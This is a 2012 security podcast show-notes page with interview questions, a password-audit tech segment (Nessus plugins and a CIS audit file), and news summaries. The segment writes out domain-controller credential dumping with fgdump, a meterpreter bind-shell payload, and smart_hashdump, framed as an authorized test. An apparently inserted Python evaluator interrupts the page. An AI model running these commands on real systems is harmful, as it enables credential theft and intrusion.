Episode284

From Paul's Security Weekly
Revision as of 18:21, 19 April 2012 by Paul Asadoorian (Talk | contribs)

Palo Alto Networks
Tenable Network Security
The SANS Institute
Pwnie Express
Black Hills Information Security
BlackSquirrel
Onapsis

Announcements & Shameless Plugs

PaulDotCom Security Weekly - Episode 283 for Thursday April 12th, 2012

  • DerbyCon Call for Papers and ticket registration are coming up quickly: Friday May 4, 2012 at 10:00AM. The PaulDotCom crew will be in attendance for DerbyCon. Training begins Thursday September 27th and the DerbyCon conference runs the 28th thru 30th.
  • Security BSides everywhere: Iowa, London, Chicago, Austin, Charleston, more. http://www.securitybsides.com/ - We have 5 BSides tickets to give away! Listen to the instructions at the end of Episode 282 for complete details!

Interview: PureHate

Introduction

Martin “Pure Hate” Bos works as a penetration tester for Accuvant, is one of the core developers for Backtrack-Linux and is a Co-Founder of Question-Defense.com, a website dedicated to answering technical questions on a daily basis. He has the largest online WPA Cracking service on the web and, most recently, Martin helped found DerbyCon, the most Epic Con of all time. He's on the show to give us an update on training for DerbyCon and to talk BackTrack.


[Photo: MartinBos.jpg]

Questions

  1. Tell us about Derbycon, what are the goals of this year's conference? Why should people attend?
  2. Tickets are the hot topic lately, how will tickets work and what's the scoop for this year?
  3. How did you get your start in information security?
  4. Tell us about Question Defense and what was your motivation in creating the site?
  5. What is the most popular question you receive on the web site?
  6. What are some of the strangest questions you get on the web site?
  7. Why crack password hashes? I mean, if you can get the password hash, isn't it game over at that point?
  8. What are the most difficult passwords to crack?
  9. Tell us about password cracking setups, what's the most effective and easiest setup to create?
  10. What's the cost of that setup?
  11. Why does our Password Policy suck?
  12. What did you think of the recent "ZeroDay" discovered by the InfoSec institute?
  13. Why does Chris Hadnagy refer to you as "Pure Love"?

5 Questions:

1) Windows , OS X, Linux, or OS/2 Warp

2) In a game of ass grabby grabby, would you prefer to go first or second?

3) If you had to choose who to make out with from the following list: Jessica Alba, Dave Kennedy, or a female robot from your favorite Sci-fy flick

4) Three words to describe yourself

5) If you had to write a book about yourself, what would the title be?

Tech segment

Larry's Password Audit

Recently we were asked to do a password assessment for a customer, and they wanted to know what tools we used to do it and how it was done. The scope for the audit was fairly specific. The customer has a policy on Windows password complexity, length, frequency of change, etc., and they wanted to see who was compliant with these policies - for whatever reason, they were not using GPO or the domain to enforce them.

So we took two approaches. First was the local workstations and local accounts. We performed a credentialed Nessus scan with a custom policy and included the following plugins:

42898 SMB Registry : Stop the Registry Service after the scan (WMI)
10870 Login configurations
10917 SMB Scope
17351 Kerberos configuration
17651 Microsoft Windows SMB : Obtains the Password Policy
21745 Authentication Failure - Local Checks Not Run
35704 SMB Registry : Stop the Registry Service after the scan
10898 Microsoft Windows - Users Information : Never changed password
12634 Authenticated Check: OS Name and Installed Package Enumeration
35706 SMB Registry : Stopping the Registry Service after the scan failed
10912 Microsoft Windows - Local Users Information : Can't change password
42897 SMB Registry : Start the Registry Service during the scan (WMI)
19506 Nessus Scan Information
35705 SMB Registry : Starting the Registry Service during the scan failed
10896 Microsoft Windows - Users Information : Can't change password
35703 SMB Registry : Start the Registry Service during the scan
21156 Windows Compliance Checks
10916 Microsoft Windows - Local Users Information : Passwords never expire
10900 Microsoft Windows - Users Information : Passwords never expires
10914 Microsoft Windows - Local Users Information : Never changed passwords


Secondly, we used a custom Nessus audit file to inspect the registry of each system. Because the customer had a mixed environment, the policy addresses XP, Win 7, Server 2008 and Enterprise DCs all in one file. Yes, this will produce some false positives, but we can tell which OS section failed for each host and which one passes. In combination, these two approaches should cover all of the local, non-domain accounts.

Here's the audit file:

<check_type : "Windows" version : "2">

<group_policy: "CIS Windows XP Desktop">
# 2.1.1 Minimum Password Length: 8 Characters

<custom_item>
 type: PASSWORD_POLICY
 description: "XP 2.1.1 Minimum Password Length: 8 Characters"
 value_type: POLICY_DWORD
 value_data: [8..MAX]
 password_policy: MINIMUM_PASSWORD_LENGTH
 info  : "Larry Pesce - from CIS benchmarks"
</custom_item>

# 2.1.2 Maximum Password Age: 90 Days

<custom_item>
 type: PASSWORD_POLICY
 description: "XP 2.1.2 Maximum Password Age: 90 Days"
 value_type: TIME_DAY
 value_data: [MIN..90]
 password_policy: MAXIMUM_PASSWORD_AGE
 info  : "Larry Pesce - from CIS benchmarks"
</custom_item>

# 2.2.2.1 Minimum Password Age: 1 day

<custom_item>
 type: PASSWORD_POLICY
 description: "XP 2.2.2.1 Minimum Password Age: 1 day"
 value_type: TIME_DAY
 value_data: [1..MAX]
 password_policy: MINIMUM_PASSWORD_AGE
 info  : "Larry Pesce - from CIS benchmarks" 
</custom_item>

# 2.2.2.2 Maximum Password Age: 90 days

<custom_item>
 type: PASSWORD_POLICY
 description: "XP 2.2.2.2 Maximum Password Age: 90 days"
 value_type: TIME_DAY
 value_data: [MIN..90]
 password_policy: MAXIMUM_PASSWORD_AGE
 info  : "Larry Pesce - from CIS benchmarks"
</custom_item>

# 2.2.2.3 Minimum Password Length: 8 characters

<custom_item>
 type: PASSWORD_POLICY
 description: "XP 2.2.2.3 Minimum Password Length: 8 characters"
 value_type: POLICY_DWORD
 value_data: [8..MAX]
 password_policy: MINIMUM_PASSWORD_LENGTH
 info  : "Larry Pesce - from CIS benchmarks"
</custom_item>

# 2.2.2.4 Password Complexity: Enabled

<custom_item>
 type: PASSWORD_POLICY
 description: "XP 2.2.2.4 Password Complexity: Enabled"
 value_type: POLICY_DWORD
 value_data: 1
 password_policy: COMPLEXITY_REQUIREMENTS
 info  : "Larry Pesce - from CIS benchmarks"
</custom_item>

# 2.2.2.5 Password History: 24 passwords remembered

<custom_item>
 type: PASSWORD_POLICY
 description: "XP 2.2.2.5 Password History: 24 passwords remembered"
 value_type: POLICY_DWORD
 value_data: [24..MAX]
 password_policy: ENFORCE_PASSWORD_HISTORY
 info  : "Larry Pesce - from CIS benchmarks"
</item>

# 3.2.1.31 Interactive Logon: Prompt User to Change Password Before Expiration: 14 days

</group_policy>

<group_policy: "CIS Windows 7 Benchmark v1.1.0">

#	
## 1.1 Account Policies
#

<custom_item>
 type		: PASSWORD_POLICY
 description	: "Win7 1.1.1 Enforce Password History"
 info		: "Ensure a control is set up to prevent a password from being reused by an end user."
 info		: "CCE-8912-8"
 value_type	: POLICY_DWORD
 value_data	: [24..MAX]
 password_policy	: ENFORCE_PASSWORD_HISTORY
 info  : "Larry Pesce - from CIS benchmarks"
</custom_item>

<custom_item>
 type		: PASSWORD_POLICY
 description	: "Win7 1.1.2 Maximum Password Age"
 info		: "Ensure a control is set up that defines a limit on the number of days a password is valid before it expires."
 info		: "CCE-9193-4"
 value_type	: TIME_DAY
 value_data	: [MIN..90]
 password_policy	: MAXIMUM_PASSWORD_AGE
 info  : "Larry Pesce - from CIS benchmarks"
</custom_item>

<custom_item>
 type		: PASSWORD_POLICY
 description	: "Win7 1.1.3 Minimum Password Age"
 info		: "Ensure a control is set up that defines a limit on the number of days a password must be used before it can be changed."
 info		: "CCE-9330-2"
 value_type	: TIME_DAY
 value_data	: [1..MAX]
 password_policy	: MINIMUM_PASSWORD_AGE
 info  : "Larry Pesce - from CIS benchmarks"
</custom_item>

<custom_item>
 type		: PASSWORD_POLICY
 description	: "Win7 1.1.4 Minimum Password Length"
 info		: "Ensure a control is set up that defines a minimum number of characters a user password must contain."
 info		: "CCE-9357-5"
 value_type	: POLICY_DWORD
 value_data	: [8..MAX] 
 password_policy	: MINIMUM_PASSWORD_LENGTH
 info  : "Larry Pesce - from CIS benchmarks"
</custom_item>

<custom_item>
 type		: PASSWORD_POLICY
 description	: "Win 7 1.1.5 Password Must Meet Complexity Requirements"
 info		: "Ensure a control is in place that determines if passwords meet a certain level of complexity."
 info		: "CCE-9370-8"
 value_type	: POLICY_SET
 value_data	: "Enabled"
 password_policy	: COMPLEXITY_REQUIREMENTS
 info  : "Larry Pesce - from CIS benchmarks"
</custom_item>

</group_policy>	

<group_policy: "CIS Domain Controller Enterprise">

# 2.1.1 Minimum Password Length: 8 Characters

<custom_item>
 type: PASSWORD_POLICY
 description: "DC Enterprise 2.1.1 Minimum Password Length"
 info: "Setting the registry value so that 8 characters is the minimum alloted length of a password ensures that the computer is secured against input of the correct password by unknown users. This is a stepping stone for account lockout policy by preventing the user from accessing the computer without the correct password.
 "
 info: "Larry Pesce - from CIS benchmarks"
 info: "http://www.cisecurity.org/tools2/windows/CIS_Win2003_DC_Benchmark_v2.0.pdf"
 value_type: POLICY_DWORD
 value_data: [8..MAX]
 password_policy: MINIMUM_PASSWORD_LENGTH
</custom_item>

# 2.1.2 Maximum Password Age: 42 Days

<custom_item>
 type: PASSWORD_POLICY
 description: "DC Enterprise 2.1.2 Maximum Password Age"
 info: "Having a password for only 42 days prevents said passwords from becoming an easy way to access the computer; one or more accounts being shared between users for personal needs, maintenance, or otherwise means that more and more people will know the password.
 "
 info: "Larry Pesce - from CIS benchmarks"
 info: "http://www.cisecurity.org/tools2/windows/CIS_Win2003_DC_Benchmark_v2.0.pdf"
 value_type: TIME_DAY
 value_data: [MIN..42]
 password_policy: MAXIMUM_PASSWORD_AGE
</custom_item>

# 2.2.2.1 Minimum Password Age: 1 day

<custom_item>
 type: PASSWORD_POLICY
 description: "DC Enterprise 2.2.2.1 Minimum Password Age"
 info: "When the user may only change the password once per day, as opposed to as many times as desired, a buffer is created if a hacker attempts to change the user's password to escape detection or otherwise.
 "
 info: "Larry Pesce - from CIS benchmarks"
 info: "http://www.cisecurity.org/tools2/windows/CIS_Win2003_DC_Benchmark_v2.0.pdf"
 value_type: TIME_DAY
 value_data: [1..MAX]
 password_policy: MINIMUM_PASSWORD_AGE  
</custom_item>

# 2.2.2.2 Maximum Password Age: 42 days

<custom_item>
 type: PASSWORD_POLICY
 description: "DC Enterprise 2.2.2.2 Maximum Password Age"
 info: "Having a password for only 42 days prevents said passwords from becoming an easy way to access the computer; one or more accounts being shared between users for personal needs, maintenance, or otherwise means that more and more people will know the password.
 "
 info: "Larry Pesce - from CIS benchmarks"
 info: "http://www.cisecurity.org/tools2/windows/CIS_Win2003_DC_Benchmark_v2.0.pdf"
 value_type: TIME_DAY
 value_data: [MIN..42]
 password_policy: MAXIMUM_PASSWORD_AGE
</custom_item>

# 2.2.2.3 Minimum Password Length: 8 characters

<custom_item>
 type: PASSWORD_POLICY
 description: "DC Enterprise 2.2.2.3 Minimum Password Length"
 info: "Setting the registry value so that 8 characters is the minimum alloted length of a password ensures that the computer is secured against input of the correct password by unknown users. This is a stepping stone for account lockout policy by preventing the user from accessing the computer without the correct password.
 "
 info: "Larry Pesce - from CIS benchmarks"
 info: "http://www.cisecurity.org/tools2/windows/CIS_Win2003_DC_Benchmark_v2.0.pdf"
 value_type: POLICY_DWORD
 value_data: [8..MAX]
 password_policy: MINIMUM_PASSWORD_LENGTH
</custom_item>

# 2.2.2.4 Password Complexity: Enabled

<custom_item>
 type: PASSWORD_POLICY
 description: "DC Enterprise 2.2.2.4 Password Complexity"
 info: "Complex passwords are essential in preventing random guesses of the passwords. Password complexity requires the user to include at least three of the following in the password, in addition to the password already being 8 characters long: upper and lower case letters, letters, numbers, and special characters. Special characters are non-alphanumeric symbols.
 "
 info: "Larry Pesce - from CIS benchmarks"
 info: "http://www.cisecurity.org/tools2/windows/CIS_Win2003_DC_Benchmark_v2.0.pdf"
 value_type: POLICY_DWORD
 value_data: 1
 password_policy: COMPLEXITY_REQUIREMENTS
</custom_item>


# 2.2.2.5 Password History: 24 passwords remembered

<custom_item>
 type: PASSWORD_POLICY
 description: "DC Enterprise 2.2.2.5 Password History"
 info: "Prevents the user from repeating passwords when the passwords are changed. In conjunction with the maximum and minimum password lengths, the machine is very secure against random password guesses and intrusions with these settings enabled.
"
 info: "Larry Pesce - from CIS benchmarks"
 info: "http://www.cisecurity.org/tools2/windows/CIS_Win2003_DC_Benchmark_v2.0.pdf" 
 value_type: POLICY_DWORD
 value_data: [24..MAX]
 password_policy: ENFORCE_PASSWORD_HISTORY
</custom_item>

</group_policy>	

<group_policy: "CIS Security Configuration Benchmark For Microsoft Windows Server 2008">

<custom_item>
 type		: PASSWORD_POLICY
 description	: "2K8 Server 1.1.1 Enforce password history (>=24)"
 info		: "This control defines the number of unique passwords a user must leverage before a previously used password can be reused."
 info		: "CCE-2237-6"
 info		: "Larry Pesce - from CIS benchmarks"
 value_type	: POLICY_DWORD
 value_data	: [24..MAX]
 password_policy: ENFORCE_PASSWORD_HISTORY
</custom_item>

<custom_item>
 type		: PASSWORD_POLICY
 description	: "2K8 Server 1.1.2 Maximum password age (<=90)"
 info		: "This control defines how many days a user can use the same password before it expires."
 info		: "CCE-2200-4"
 info		: "Larry Pesce - from CIS benchmarks"
 value_type	: TIME_DAY
 value_data	: [MIN..90]
 password_policy: MAXIMUM_PASSWORD_AGE
</custom_item>

<custom_item>
 type		: PASSWORD_POLICY
 description	: "2K8 Server 1.1.3 Minimum password age (>=1)"
 info		: "This control defines how many days a user must use the same password before it can be changed."
 info		: "CCE-1861-4"
 info		: "Larry Pesce - from CIS benchmarks"
 value_type	: TIME_DAY
 value_data	: [1..MAX]
 password_policy: MINIMUM_PASSWORD_AGE
</custom_item>

<custom_item>
 type		: PASSWORD_POLICY
 description	: "2K8 Server 1.1.4 Minimum password length (>=8)"
 info		: "This control defines the minimum number of characters a user password must contain."
 info		: "CCE-2240-0"
 info		: "Larry Pesce - from CIS benchmarks"
 value_type	: POLICY_DWORD
 value_data	: [8..MAX]
 password_policy: MINIMUM_PASSWORD_LENGTH
</custom_item>

<custom_item>
 type		: PASSWORD_POLICY
 description	: "2K8 Server 1.1.5 Password must meet complexity requirements"
 info		: "This control determines if new passwords are required to satisfy a certain level of complexity."
 info		: "CCE-2126-1"
 info		: "Larry Pesce - from CIS benchmarks"
 value_type	: POLICY_SET
 value_data	: "Enabled"
 password_policy: COMPLEXITY_REQUIREMENTS
</custom_item>

</group_policy>	


</check_type>
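To see what a PASSWORD_POLICY check in that file actually decides, here is an added example (my code, not the page's audit file or anything from Nessus): a small Python evaluator that parses custom_item blocks in the same syntax and scores one host's effective policy values against the [lo..hi], bare-number and "Enabled" value_data forms used above. The audit fragment and the HOST_POLICY values are constructed for the example, and treating a non-positive maximum password age as "never expires" is my assumption, not something the page states.

```python
import re

# Constructed .audit fragment in the page's custom_item syntax, trimmed to the fields the
# evaluator reads (this is not the page's own file).
AUDIT_FRAGMENT = """
<custom_item>
 description: "XP 2.2.2.3 Minimum Password Length: 8 characters"
 value_data: [8..MAX]
 password_policy: MINIMUM_PASSWORD_LENGTH
</custom_item>
<custom_item>
 description: "XP 2.2.2.2 Maximum Password Age: 90 days"
 value_data: [MIN..90]
 password_policy: MAXIMUM_PASSWORD_AGE
</custom_item>
<custom_item>
 description: "Win 7 1.1.5 Password Must Meet Complexity Requirements"
 value_data: "Enabled"
 password_policy: COMPLEXITY_REQUIREMENTS
</custom_item>
"""
# Constructed effective policy of one host, keyed by the audit file's password_policy names.
HOST_POLICY = {"MINIMUM_PASSWORD_LENGTH": 7, "MAXIMUM_PASSWORD_AGE": 42, "COMPLEXITY_REQUIREMENTS": 0}
ITEM_RE = re.compile(r"<custom_item>(.*?)</custom_item>", re.S)
FIELD_RE = re.compile(r'^\s*(\w+)\s*:\s*"?([^"\n]*?)"?\s*$', re.M)

def parse_items(text):
    """Return one {field: value} dict per <custom_item>; the first value wins for repeated keys."""
    items = []
    for body in ITEM_RE.findall(text):
        fields = {}
        for key, val in FIELD_RE.findall(body):
            fields.setdefault(key, val)
        items.append(fields)
    return items

def check(value_data, actual):
    """Evaluate the value_data forms the page uses: [lo..hi] ranges, a bare number, or Enabled."""
    m = re.fullmatch(r"\[(MIN|\d+)\.\.(MAX|\d+)\]", value_data)
    if m:
        lo = 0 if m.group(1) == "MIN" else int(m.group(1))
        hi = float("inf") if m.group(2) == "MAX" else int(m.group(2))
        return lo <= actual <= hi
    if value_data.isdigit():
        return actual == int(value_data)
    return (value_data.lower() == "enabled") == bool(actual)  # POLICY_SET: Enabled/Disabled

def evaluate(audit_text, host_policy):
    """Map each check description to PASSED/FAILED against one host's policy values."""
    results = {}
    for item in parse_items(audit_text):
        actual = host_policy[item["password_policy"]]
        ok = check(item["value_data"], actual)
        # Assumption: a non-positive maximum age encodes "never expires"; it must not pass [MIN..90].
        if item["password_policy"] == "MAXIMUM_PASSWORD_AGE" and actual <= 0:
            ok = False
        results[item["description"]] = "PASSED" if ok else "FAILED"
    return results
```

Feeding the same evaluator the full file above would flag a host on every OS section it does not match, which is exactly the false-positive effect of combining XP, Win 7, 2008 and DC checks in one policy.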


In order to deal with the domain accounts we've had to take a different approach: password cracking!

First, to get hold of the hashes we can use one of two methods: fgdump and Metasploit. As part of the test we were given physical access and credentials to the PDC/Backup DC. First up, fgdump:

fgdump.exe -h hostname -p password -u username

This can, in some cases, give us a bunch of hashes back that we can take into rcracki with rainbow tables from freerainbowtables.com.

Another alternative is to use Metasploit. In this case we will create a meterpreter payload executable, copy it to the DC and execute it so that we can connect with Metasploit. Let's get started!

First off, the payload to copy:

./msfpayload windows/meterpreter/bind_tcp LPORT=4444 X > met-listen.exe

Then copy and execute that on the DC. Then we need to connect from our Metasploit instance to that meterpreter instance:

./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=<DC IP> LPORT=4444 E

Once we have a meterpreter session we want to use smart_hashdump, as this will intelligently figure out our DC version:

meterpreter> run smart_hashdump

Next, more hashes for use in rcracki and rainbow tables!

Stories

Paul's Stories

  1. Why You Should Turn Your Game Consoles Off - In addition to saving on your power bill, it's a good idea to turn these devices off. Here's the thing: gaming consoles are computers like anything else; they carry personal information, financial information, and more. The military is interested in hacking game consoles. The reason? Check this out: Officials want to be able to keep tabs on live communications between a person using a modified console and whoever it is they are chatting with. They also want to be able to glean data from a used game console and obtain useful information about the prior owner's communications with other gamers.
  2. HP study finds widespread custom Web application flaws - While overall Web application flaws in commercially available applications have been in decline since 2006, a review of more than 359 unique custom Web applications conducted by HP Fortify paints a much different picture. Many of the custom Web applications were found rampant with common coding errors, leaving them prone to cross-site scripting and SQL injection attacks. Yeah, the numbers are funny, huh? Commercial web apps see a decline in vulnerabilities, but is that because they are patching them or not disclosing them, or both? However, internally written web apps, well, suck when it comes to security. But we see more of them, as it's easier to find talent and use tools to create web applications. If you are in security in IT, listen to the interview with Gene Kim; it's sound advice to get ahead of the curve, educate developers, and teach QA how to find flaws before apps go into production.
  3. Fun Hacking in a Bus - Traveling from New York to Toronto [Greyhound/Trailways] - Embedded device fail, on a bus! Default passwords lead to being able to configure the device and see what devices are connected via DHCP.
  4. Universal IPSec VPN client for Android 4.0 - VPNs are great; however, if they are running on a platform that sucks at security, like Android, they give a false sense of security.
  5. Android Trojan distracts Japanese with anime and porn - And speaking of sucking, anime and porn lead to Android compromise, nice! The malware, specifically designed to target Japanese users, is hidden in apps which show internet-based video trailers. On installation, the malicious apps request that the user grant them permission to read contact data and read phone state and identity. If granted by the user, this will enable them to pilfer the Android ID, phone number and the victim’s entire contacts list including names, email addresses and phone numbers.
  6. Techie gets naked to protest TSA - Talk about hacking naked! Check this out: Naturally, there were families with children present and expressions of shock and disgust were reportedly uttered. Because, of course, the naked human body is America's most pressing red-level threat.
  7. Should teachers and students be Facebook friends? - No, if you are a teacher, here is some advice: Don't be on Facebook.
  8. Compliance isn't security - Funny thing about compliance and security, they are two separate things.

Larry's Stories

John's Stories